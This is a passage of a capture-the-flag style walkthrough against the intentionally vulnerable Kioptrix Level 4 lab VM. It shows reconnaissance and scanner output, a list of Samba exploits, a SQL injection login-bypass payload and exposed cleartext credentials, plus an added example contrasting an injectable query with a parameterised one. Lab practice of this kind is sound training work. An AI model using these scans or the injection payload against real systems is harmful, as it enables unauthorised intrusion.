Vulnhub range practice series -- Kioptrix Level #4




    Today's test: penetrating the Kioptrix Level #4 target machine:

    Vulnhub is a practice platform that provides a wide range of vulnerable environments; most of them are ready-made virtual machine images with several vulnerabilities designed in. This article walks through a penetration test of the Kioptrix Level #4 target, covering host discovery (nmap/netdiscover), port scanning (nmap/masscan), directory scanning (dirb/dirsearch), SQL injection, and UDF-based privilege escalation.

    Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

    1. It’s possible to get root remotely [ Edit: sorry not what I meant ]
      1a. It’s possible to remotely compromise the machine
      Stays within the target audience of this site
      Must be “realistic” (well kinda…)
      Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
      I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
      Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
      I’d love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
      – A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.
      – Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
      Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
      Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
      So I hope you enjoy this one.
      The Kioptrix Team
      Source: http://www.kioptrix.com/blog/?p=604
      Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive



    1.1 Target information


    1.2 Target setup


    2.1 Host discovery

    2.1.1 netdiscover

    └─# netdiscover -r
     Currently scanning: Finished!   |   Screen View: Unique Hosts                                                        
     5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                      
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
     -----------------------------------------------------------------------------
                       00:0c:29:41:10:00      1      60  VMware, Inc.
                       ae:d5:7e:a8:51:6a      2     120  Unknown vendor
                       a0:54:f9:b3:23:54      2     120  Unknown vendor

    2.1.2 arp-scan host scan

    └─# arp-scan -l
    Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4:
    Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
    	00:0c:29:41:10:00	VMware, Inc.
    	ae:d5:7e:a8:51:6a	(Unknown: locally administered)
    	22:cb:7f:9b:2c:c1	(Unknown: locally administered)
    3 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded


    2.2 Port scan

    └─# nmap -sC -sV -oA Kioptrix4
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
    Nmap scan report for
    Host is up (0.00028s latency).
    Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
    22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
    |_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
    80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    |_http-title: Site doesn't have a title (text/html).
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
    MAC Address: 00:0C:29:41:10:00 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Host script results:
    | smb-os-discovery: 
    |   OS: Unix (Samba 3.0.28a)
    |   Computer name: Kioptrix4
    |   NetBIOS computer name: 
    |   Domain name: localdomain
    |   FQDN: Kioptrix4.localdomain
    |_  System time: 2024-06-12T16:34:31-04:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    |_smb2-time: Protocol negotiation failed (SMB2)
    |_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds


    2.3 Fingerprinting

    └─# whatweb -v
    WhatWeb report for
    Status    : 200 OK
    Title     : <None>
    IP        :
    Country   : RESERVED, ZZ
    Summary   : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
    Detected Plugins:
    [ Apache ]
    	The Apache HTTP Server Project is an effort to develop and 
    	maintain an open-source HTTP server for modern operating 
    	systems including UNIX and Windows NT. The goal of this 
    	project is to provide a secure, efficient and extensible 
    	server that provides HTTP services in sync with the current 
    	HTTP standards. 
    	Version      : 2.2.8 (from HTTP Server Header)
    	Google Dorks: (3)
    	Website     : http://httpd.apache.org/
    [ HTTPServer ]
    	HTTP server header string. This plugin also attempts to 
    	identify the operating system from the server header. 
    	OS           : Ubuntu Linux
    	String       : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)
    [ PHP ]
    	PHP is a widely-used general-purpose scripting language 
    	that is especially suited for Web development and can be 
    	embedded into HTML. This plugin identifies PHP errors, 
    	modules and versions and extracts the local file path and 
    	username if present. 
    	Version      : 5.2.4-2ubuntu5.6
    	Module       : Suhosin-Patch
    	Version      : 5.2.4-2ubuntu5.6
    	Google Dorks: (2)
    	Website     : http://www.php.net/
    [ PasswordField ]
    	find password fields 
    	String       : mypassword (from field name)
    [ X-Powered-By ]
    	X-Powered-By HTTP header 
    	String       : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)
    HTTP Headers:
    	HTTP/1.1 200 OK
    	Date: Wed, 12 Jun 2024 20:38:05 GMT
    	Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    	X-Powered-By: PHP/5.2.4-2ubuntu5.6
    	Content-Length: 1255
    	Connection: close
    	Content-Type: text/html


    • Apache[2.2.8],
    • HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch],
    • PasswordField[mypassword],
    • PHP[5.2.4-2ubuntu5.6][Suhosin-Patch],
    • X-Powered-By[PHP/5.2.4-2ubuntu5.6]

    2.4 Directory scan

    2.4.1 dirb directory scan

    └─# dirb
    DIRB v2.22    
    By The Dark Raver
    START_TIME: Wed Jun 12 08:40:08 2024
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    GENERATED WORDS: 4612                                                          
    ---- Scanning URL: ----
    + (CODE:403|SIZE:326)                                                                                                                                                              
    ==> DIRECTORY:                                                                                                                                                                      
    + (CODE:200|SIZE:1255)                                                                                                                                                                
    + (CODE:200|SIZE:1255)                                                                                                                                                            
    ==> DIRECTORY:                                                                                                                                                                        
    + (CODE:302|SIZE:0)                                                                                                                                                                  
    + (CODE:302|SIZE:220)                                                                                                                                                                
    + (CODE:403|SIZE:331)                                                                                                                                                         
    ---- Entering directory: ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
    ---- Entering directory: ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
    END_TIME: Wed Jun 12 08:40:33 2024
    DOWNLOADED: 4612 - FOUND: 6

    FOUND: 6, i.e. dirb found six paths (two of them directories with listing enabled)


    2.4.2 dirsearch directory scan

    └─# dirsearch -u -e * -x 404,403
    /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
      from pkg_resources import DistributionNotFound, VersionConflict
      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )
    Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
    Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txt
    [08:40:50] Starting: 
    [08:41:17] 200 -  109B  - /checklogin                                       
    [08:41:17] 200 -  109B  - /checklogin.php                                   
    [08:41:22] 200 -  298B  - /database.sql                                     
    [08:41:33] 301 -  350B  - /images  ->           
    [08:41:33] 200 -  930B  - /images/                                          
    [08:41:40] 302 -    0B  - /logout/  ->  index.php                           
    [08:41:40] 302 -    0B  - /logout  ->  index.php                            
    [08:41:42] 302 -  220B  - /member/  ->  index.php                           
    [08:41:42] 302 -  220B  - /member  ->  index.php
    [08:41:42] 302 -  220B  - /member/login  ->  index.php
    [08:41:42] 302 -  220B  - /member/admin.asp  ->  index.php
    [08:41:42] 302 -  220B  - /member/logon  ->  index.php
    [08:41:42] 302 -  220B  - /member/login.rb  ->  index.php                   
    [08:41:42] 302 -  220B  - /member/signin  ->  index.php                     
    [08:41:42] 302 -  220B  - /member/login.html  ->  index.php                 
    [08:41:42] 302 -  220B  - /member.php  ->  index.php                        
    [08:41:42] 302 -  220B  - /member/login.jsp  ->  index.php                  
    [08:41:42] 302 -  220B  - /member/login.asp  ->  index.php                  
    [08:41:42] 302 -  220B  - /member/login.py  ->  index.php
    [08:41:42] 302 -  220B  - /member/login.39772.zip  ->  index.php            
    Task Completed


    2.5 Vulnerability entry points

    2.5.1 Visiting the home page


    • username: john
    • password: 1' or '1' = '1

    2.5.2 nmap vulnerability scan

    └─# nmap -A -v -sS -Pn -T4 --script=vuln
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
    NSE: Loaded 150 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 08:47
    Completed NSE at 08:47, 10.01s elapsed
    Initiating NSE at 08:47
    Completed NSE at 08:47, 0.00s elapsed
    Initiating ARP Ping Scan at 08:47
    Scanning [1 port]
    Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 08:47
    Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
    Initiating SYN Stealth Scan at 08:47
    Scanning [1000 ports]
    Discovered open port 22/tcp on
    Discovered open port 139/tcp on
    Discovered open port 445/tcp on
    Discovered open port 80/tcp on
    Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
    Initiating Service scan at 08:47
    Scanning 4 services on
    Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
    Initiating OS detection (try #1) against
    NSE: Script scanning
    Initiating NSE at 08:47
    Completed NSE at 08:54, 362.52s elapsed
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.09s elapsed
    Nmap scan report for
    Host is up (0.0010s latency).
    Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
    22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    | http-enum: 
    |   /database.sql: Possible database backup
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
    |_  /index/: Potentially interesting folder
    |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=
    |   Found the following possible CSRF vulnerabilities: 
    |     Path:
    |     Form id: myusername
    |     Form action: checklogin.php
    |     Path:
    |     Form id: 
    |     Form action: index.php
    |     Path:
    |     Form id: myusername
    |_    Form action: checklogin.php
    | http-slowloris-check: 
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    MAC Address: 00:0C:29:41:10:00 (VMware)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=199 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Host script results:
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    |_smb-vuln-ms10-061: false
    |_smb-vuln-ms10-054: false
    1   1.02 ms
    NSE: Script Post-scanning.
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.00s elapsed
    Initiating NSE at 08:54
    Completed NSE at 08:54, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 393.04 seconds
               Raw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)

    2.5.3 nikto vulnerability scan

    └─# nikto -h
    - Nikto v2.5.0
    + Target IP:
    + Target Hostname:
    + Target Port:        80
    + Start Time:         2024-06-12 08:47:42 (GMT-4)
    + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
    + /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb  4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
    + /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
    + /index: Uncommon header 'tcn' found, with contents: list.
    + /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
    + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
    + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
    + PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
    + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
    + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
    + /database.sql: Database SQL found.
    + /icons/: Directory indexing found.
    + /images/: Directory indexing found.
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
    + /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
    + 8908 requests: 1 error(s) and 22 item(s) reported on remote host
    + End Time:           2024-06-12 08:48:41 (GMT-4) (59 seconds)
    + 1 host(s) tested

    /database.sql: Database SQL found.

    • Username: john
    • Password: 1234
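The login bypass in 2.5.1 works because checklogin.php builds its query from the form fields as a string; the credentials in database.sql above then show the passwords are also stored in clear text. The following is an added example, not code from the Kioptrix VM: a Python stand-in for checklogin.php using an in-memory SQLite table (the members table layout is an assumption; john/1234 are the credentials from database.sql), showing the vulnerable concatenated query beside the parameterised form that rejects the same input.

```python
import sqlite3

# Constructed sample rows standing in for the target's members table.
# john/1234 comes from database.sql on the page; robert's value is a placeholder.
SAMPLE_USERS = [("john", "1234"), ("robert", "placeholder-password")]

# The exact password submitted in section 2.5.1.
INJECTION = "1' or '1'='1"


def build_db():
    """Create an in-memory SQLite database holding the constructed members table.
    (Passwords are stored in clear text here only to mirror what database.sql
    revealed; a real application should store a salted password hash.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """The string-concatenation pattern behind the bypass.

    With the injected password the statement becomes
      ... WHERE username='john' AND password='1' or '1'='1'
    which SQL parses as (username='john' AND password='1') OR ('1'='1'),
    so a row is always returned and a row-count check lets the login through.
    """
    sql = ("SELECT username FROM members WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """Hardened form: inputs are bound as parameters, so the quotes and the
    OR clause are compared literally against the stored password, never parsed."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def demo():
    """Run both checks with the real credentials and with the injected password."""
    conn = build_db()
    return {
        "vuln_real_creds": vulnerable_login(conn, "john", "1234"),
        "vuln_injection": vulnerable_login(conn, "john", INJECTION),
        "safe_real_creds": safe_login(conn, "john", "1234"),
        "safe_injection": safe_login(conn, "john", INJECTION),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```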

    2.5.4 enum4linux scan

    └─# enum4linux 192.168..1.6
    Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024
     =========================================( Target Information )=========================================
    Target ........... 192.168..1.6
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
     ============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================
    [E] Can't find workgroup/domain
     ================================( Nbtstat Information for 192.168..1.6 )================================
    Looking up status of
    No reply from
     ===================================( Session Check on 192.168..1.6 )===================================
    [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
    └─# enum4linux 
    Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024
     =========================================( Target Information )=========================================
    Target ...........
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
     ============================( Enumerating Workgroup/Domain on )============================
    [+] Got domain/workgroup name: WORKGROUP
     ================================( Nbtstat Information for )================================
    Looking up status of
    	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
    	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
    	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
    	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
    	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    	MAC Address = 00-00-00-00-00-00
     ====================================( Session Check on )====================================
    [+] Server allows sessions using username '', password ''
     =================================( Getting domain SID for )=================================
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
     ===================================( OS information on )===================================
    [E] Can't get OS info with smbclient
    [+] Got OS info for from srvinfo: 
    	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
    	platform_id     :	500
    	os version      :	4.9
    	server type     :	0x809a03
     ========================================( Users on )========================================
    index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
    index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
    index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
    index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
    index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)
    user:[nobody] rid:[0x1f5]
    user:[robert] rid:[0xbbc]
    user:[root] rid:[0x3e8]
    user:[john] rid:[0xbba]
    user:[loneferret] rid:[0xbb8]
     ==================================( Share Enumeration on )==================================
    	Sharename       Type      Comment
    	---------       ----      -------
    	print$          Disk      Printer Drivers
    	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
    Reconnecting with SMB1 for workgroup listing.
    	Server               Comment
    	---------            -------
    	Workgroup            Master
    	---------            -------
    	WORKGROUP            KIOPTRIX4
    [+] Attempting to map shares on
    //$	Mapping: DENIED Listing: N/A Writing: N/A
    [E] Can't understand response:
    //$	Mapping: N/A Listing: N/A Writing: N/A
     ============================( Password Policy Information for )============================
    [+] Attaching to using a NULL share
    [+] Trying protocol 139/SMB...
    [+] Found domain(s):
    	[+] KIOPTRIX4
    	[+] Builtin
    [+] Password Info for Domain: KIOPTRIX4
    	[+] Minimum password length: 5
    	[+] Password history length: None
    	[+] Maximum password age: Not Set
    	[+] Password Complexity Flags: 000000
    		[+] Domain Refuse Password Change: 0
    		[+] Domain Password Store Cleartext: 0
    		[+] Domain Password Lockout Admins: 0
    		[+] Domain Password No Clear Change: 0
    		[+] Domain Password No Anon Change: 0
    		[+] Domain Password Complex: 0
    	[+] Minimum password age: None
    	[+] Reset Account Lockout Counter: 30 minutes 
    	[+] Locked Account Duration: 30 minutes 
    	[+] Account Lockout Threshold: None
    	[+] Forced Log off Time: Not Set
    [+] Retieved partial password policy with rpcclient:
    Password Complexity: Disabled
    Minimum Password Length: 0
     =======================================( Groups on )=======================================
    [+] Getting builtin groups:
    [+]  Getting builtin group memberships:
    [+]  Getting local groups:
    [+]  Getting local group memberships:
    [+]  Getting domain groups:
    [+]  Getting domain group memberships:
     ===================( Users on via RID cycling (RIDS: 500-550,1000-1050) )===================
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [I] Found new SID: 
    [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
    S-1-22-1-1000 Unix User\loneferret (Local User)
    S-1-22-1-1001 Unix User\john (Local User)
    S-1-22-1-1002 Unix User\robert (Local User)
    [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
    S-1-5-32-544 BUILTIN\Administrators (Local Group)
    S-1-5-32-545 BUILTIN\Users (Local Group)
    S-1-5-32-546 BUILTIN\Guests (Local Group)
    S-1-5-32-547 BUILTIN\Power Users (Local Group)
    S-1-5-32-548 BUILTIN\Account Operators (Local Group)
    S-1-5-32-549 BUILTIN\Server Operators (Local Group)
    S-1-5-32-550 BUILTIN\Print Operators (Local Group)
    [+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
    S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
    S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
    S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
     ================================( Getting printer info for )================================
    No printers returned.
    enum4linux complete on Wed Jun 12 08:56:26 2024

    2.5.5 wfuzz fuzzing

    └─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    Total requests: 3024
    ID           Response   Lines    Word       Chars       Payload                                                                                                                                        
    000001629:   302        0 L      0 W        0 Ch        "logout"                                                                                                                                       
    000001736:   302        1 L      22 W       220 Ch      "member"                                                                                                                                       
    000002294:   301        9 L      31 W       350 Ch      "robert"                                                                                                                                       
    000001458:   301        9 L      31 W       348 Ch      "john"                                                                                                                                         
    000001350:   200        45 L     94 W       1255 Ch     "index"                                                                                                                                        
    000001337:   301        9 L      31 W       350 Ch      "images"                                                                                                                                       
    000000566:   403        10 L     33 W       326 Ch      "cgi-bin/"                                                                                                                                     
    Total time: 5.687175
    Processed Requests: 3024
    Filtered Requests: 3017
    Requests/sec.: 531.7226

    2.5.6 searchsploit search for Samba vulnerabilities

    └─# searchsploit samba 3.        
    ------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                       |  Path
    ------------------------------------------------------------------------------------- ---------------------------------
    Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                         | osx/remote/9924.rb
    Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                           | unix/remote/22468.c
    Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                 | osx/remote/16875.rb
    Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt
    Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb
    Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                   | linux/remote/9950.rb
    Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)               | linux/remote/16859.rb
    Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)             | solaris/remote/16329.rb
    Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                             | linux/dos/4732.c
    Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                    | multiple/dos/5712.pl
    Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                     | linux/remote/364.pl
    Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)              | linux_x86/remote/16860.rb
    Samba 3.3.5 - Format String / Security Bypass                                        | linux/remote/33053.txt
    Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
    Samba 3.4.5 - Symlink Directory Traversal                                            | linux/remote/33599.txt
    Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                               | linux/remote/33598.rb
    Samba 3.4.7/3.5.1 - Denial of Service                                                | linux/dos/12588.txt
    Samba 3.5.0 - Remote Code Execution                                                  | linux/remote/42060.py
    Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
    Samba 3.5.11/3.6.3 - Remote Code Execution                                           | linux/remote/37834.py
    Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                           | linux/dos/27778.txt
    Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt
    Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py
    Sambar Server 4.3/4.4 Beta 3 - Search CGI                                            | windows/remote/20223.txt
    Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access                       | windows/remote/24163.txt
    ------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results


    3.1 SQL injection

    3.1.1 Capturing the login request with Burp Suite

    └─# vim sql.txt  
    └─# cat sql.txt  
    POST /checklogin.php HTTP/1.1
    Content-Length: 47
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
